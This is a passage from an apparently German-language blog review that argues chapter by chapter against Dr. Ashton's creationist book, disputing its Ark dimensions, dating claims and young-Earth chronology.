„Nach modernen Messungen würde die Arche etwa 140 Meter lang, 23 Meter breit und 14 Meter hoch sein. Mir wurde berichtet, dass dies sehr realistische Maße für den Schiffsbau und die Stabilität auf dem Meer sind.“ (Seite 133)

Wer berichtete Dr. Ashton, dass diese Maße für den Schiffsbau für damalige Verhältnisse realistisch sein sollen? Das wäre eine wichtige Erkenntnis, allerdings müssen sich die Leser mit dieser vagen Aussage zufrieden geben. Recherchiert man jedoch nach, erscheint diese Aussage erneut abenteuerlich. Das bisher größte antike Schiffswrack, welches man vor der griechischen Insel Antikythera gefunden hatte, soll mehr als 2000 Jahre alt sein und beachtliche 50 Meter lang gewesen sein. Im Vergleich zu Noah’s Arche wäre es dennoch ein Winzling gewesen. Darüber hinaus darf man davon ausgehen, dass dieses Schiff von vielen Handwerkern und Konstrukteuren gebaut wurde, während Noah auf eine geringere und weniger qualifizierte Arbeiterschaft vertraut haben musste…

Übrigens wird gar nicht in Abrede gestellt, dass es keine Sintflut in der Antike oder noch früher gegeben haben könnte und die mögliche Entstehung des Schwarzen Meeres deutet sogar darauf hin. Die Naturkatastrophe, falls es sie gegeben haben sollte, muss gewaltig gewesen sein, aber hätte dennoch nicht ausgereicht, um global alles Leben auszulöschen. Außerdem hätte ein solches Ereignis schlimmstenfalls regionalen Einfluss auf die Evolution, wie man es auch beim Kontinent Australien beobachten kann.

Kapitel 9 von Dr. Ashton’s Pamphlet gegen die Evolution kann eigentlich vernachlässigt werden. Er wiederholt Aussagen aus vorherigen Kapiteln und schlussfolgert anhand von nicht existierenden Beweisen, dass die Erde deutlich jünger sein muss als es geologisch weitgehend wissenschaftlich anerkannt ist.

In Kapitel 10 hält er sich erneut mit radiometrischen Datierungsmethoden auf, welche nur dann als korrekt von ihm anerkannt werden, wenn sie in sein Konzept passen, aber falsch sein müssen, wenn sie nur ansatzweise die Evolution stützen. Gestein und Gesteinsschichten faszinieren ihn offensichtlich. Dr. Ashton fällt wieder ins alte Strategiemuster zurück, anhand von Ungenauigkeiten bei Messungen und Datierungen die Evolution in Frage zu stellen, anstatt seine eigene Theorie nachweisen zu wollen.

In Kapitel 11 widmet sich Dr. Ashton speziell der Urknalltheorie. Darüber darf man durchaus geteilter Meinung sein, denn es ist fürwahr ein abenteuerlicher Erklärungsversuch, wie das Universum entstanden sein soll. Es ist und bleibt eine Theorie und niemand stellt die kühne Behauptung auf, dass das Universum so entstanden sein muss. Demgegenüber gibt es ja zum Beispiel auch die Schöpfungsgeschichte, wo ein Gott in 7 Tagen die Welt erschaffen haben soll. Man könnte auch nüchtern attestieren, dass niemand wirklich weiß, wie das Universum entstanden ist, aber sich einige Leute den Kopf darüber zerbrechen und gerne eine Erklärung bieten möchten. Die Evolution selbst ist von der Urknalltheorie weit entfernt und sollte nicht kausal damit verbunden werden. Das allerdings versucht Dr. Ashton, um der Evolution einen möglichen Anfang zu entziehen.

In Kapitel 12 stellt Dr. Ashton einige Wissenschaftler vor, deren Forschungen und Experimente viele Thesen der Evolutionstheorie und wissenschaftliche Hypothesen in Frage stellen. Dennoch beweisen all diese Wissenschaftler im Gegenzug nicht die Richtigkeit der Schöpfungstheorie. Nicht ansatzweise liefern diese Wissenschaftler Nachweise über die Richtigkeit der Schöpfungsgeschichte. Nicht einmal erhöhen sie deren Wahrscheinlichkeit gegenüber der Evolution. Dr. Ashton folgt ausschließlich dem Prinzip, dass eine fehlende Beweisbarkeit auf der einen Seite den Beweis liefern würde, dass die andere Seite der Wahrheit entspricht. Das ist jedoch die Strategie, womit Verschwörungstheoretiker ihre Anhänger rekrutieren.

„Die klare Schlussfolgerung ist, dass symbolische Information oder Sprache eine Kategorie der Realität darstellt, die unabhängig von Materie oder Energie ist.“ (Seite 184)

Diese Behauptung ist meines Erachtens vollkommen falsch. Die Interpretation von Dr. Ashton ist es auf jeden Fall. Um hörbare Sprache erzeugen zu können, erfordert es Energie. Das dürfte wissenschaftlich unbestritten sein. Informationen sind die Deutungen von Gegebenheiten oder entwickelten Mustern. Und jede Informationsverarbeitung, ob im Gehirn oder maschinell erfordert ebenfalls Energie.

Bemerkenswert bis tollkühn sind Dr. Ashtons Thesen in Kapitel 13, wo er einen angeblichen Traum des babylonischen Herrschers Nebukadnezars als Basis für den vorbestimmten Lauf der Geschichte durch einen Gott beschreibt. Er verzichtet dabei vollkommen auf jegliche wissenschaftliche Analyseverfahren, welche zuvor noch so wichtig für die angebliche Widerlegung der Evolution waren. Seine historische Exkursion entfernt sich dabei von der Naturwissenschaft, welche plötzlich keine Rolle mehr zu spielen scheint.

Stimmen im Kopf von Jeanne d’Arc müssen inzwischen für die Existenz eines Gottes herhalten. Es gibt so manche Serienkiller und paranoide Gestalten, welche sich ebenfalls von angeblichen Stimmen im Kopf leiten ließen. War in deren Köpfen nun der Teufel am Werk? Das Niveau des Buches hat rapide nachgelassen. Was in menschlichen Gehirnen vor sich geht ist mindestens genauso unerklärlich wie die Entstehung der Welt und des Lebens. Es ist auch fast eine Gesetzmäßigkeit, dass irgendwelche Menschen sich dazu berufen fühlen Unerklärliches bzw. Unerforschtes erklären zu wollen. Daraus entwickeln sich Theorien.

„Dennoch liefert die Existenz einer übernatürlichen Intelligenz, eines Schöpfergottes, der unabhängig ist von Raum und Zeit, eine sinnvolle Erklärung für unsere Existenz.“ (Seite 209)

Dr. Ashton vernachlässigt jegliche Beweisführung über die Existenz dieser übernatürlichen Intelligenz und stellt es einfach als Faktum hin, weil er zu jenen Leuten gehört, die nach Erklärungen für eben jene Dinge suchen, die nicht bzw. noch nicht wissenschaftlich erklärbar sind und flüchtet sich in den Glauben an einen Gott. Millionen von Menschen glauben an einen oder gar mehrere Götter. Erklärungsnot macht erfinderisch. Wer selbst nicht genug Phantasie besitzt, findet in diversen Religionsgemeinschaften Antworten auf die eigenen Sehnsüchte, aber eben keine Antworten auf die ursprünglichen Fragen.

„Ich glaube daran, dass wir Menschen in dem „Bilde“ dieses super intelligenten Schöpfergottes gemacht wurden.“ (Seite 216)

Mit dieser dogmatischen Aussage im letzten Abschnitt seines Buches bekennt sich Dr. Ashton als gläubiger Mensch. Das ist völlig legitim. Weniger nobel hingegen ist sein Vorgehen in diesem Buch, wie er andere Erklärungsversuche für das Leben, speziell die wissenschaftlich weitgehend anerkannte Evolution regelrecht bestreitet. Fundierte Gegenbeweise könnte er dabei nicht liefern. Stattdessen basiert sein komplettes Werk auf mehr oder weniger plausibel klingenden Schlussfolgerungen basierend auf hypothetischen Aussagen.

Im Anhang (Seite 218) datiert Dr. Ashton die Schöpfung, also somit die Entstehung der Welt auf etwa das Jahr 3959 vor Christus. Das ist eine ambitionierte Aussage, denn nicht einmal der genaue Geburts- bzw. Todestag von Jesus Christus kann eindeutig datiert werden. Gleichzeitig an Datierungen im Bereich von Milliarden von Jahren Kritik zu üben, erfordert schon ein hohes Maß an Arroganz. Und selbst wenn die Evolution 2 Milliarden Jahre später begonnen hätte und die Datierungsfehler so vehement wären, würde man noch lange nicht bei etwa 4000 Jahren v. Chr. ankommen. Dinosaurier hätte es dieser Theorie zufolge gar nicht gegeben und die Fossilen wurden zur Verwirrung von Geologen und Paläontologen von jenem Schöpfergott in den Gesteinsschichten deponiert. Demnach müsste auch etwa um 4000 v.Chr. die Artenvielfalt auf dem Maximum gewesen sein und seitdem sind Lebewesen nur noch ausgestorben. Das Mammut existierte demnach nie und es gab auch keine Neandertaler, Säbelzahnkatzen und viele andere Lebewesen, von denen es faktische Nachweise gibt.

Das Pamphlet des Dr. Ashton kann recht schnell als krude Verschwörungstheorie entlarvt werden. Er kann nicht einen einzigen Beweis für seine Theorie für die Existenz eines sogenannten Schöpfergottes liefern. Deswegen besitzt die Evolution und die darauf aufbauende Evolutionstheorie mindestens die gleiche Daseinsberechtigung wie jene utopische Schöpfungsgeschichte, welche weit größere Widersprüche erkennen lässt.

Share Button

Schmetterlinge, Raupen, Insekten, Insektensterben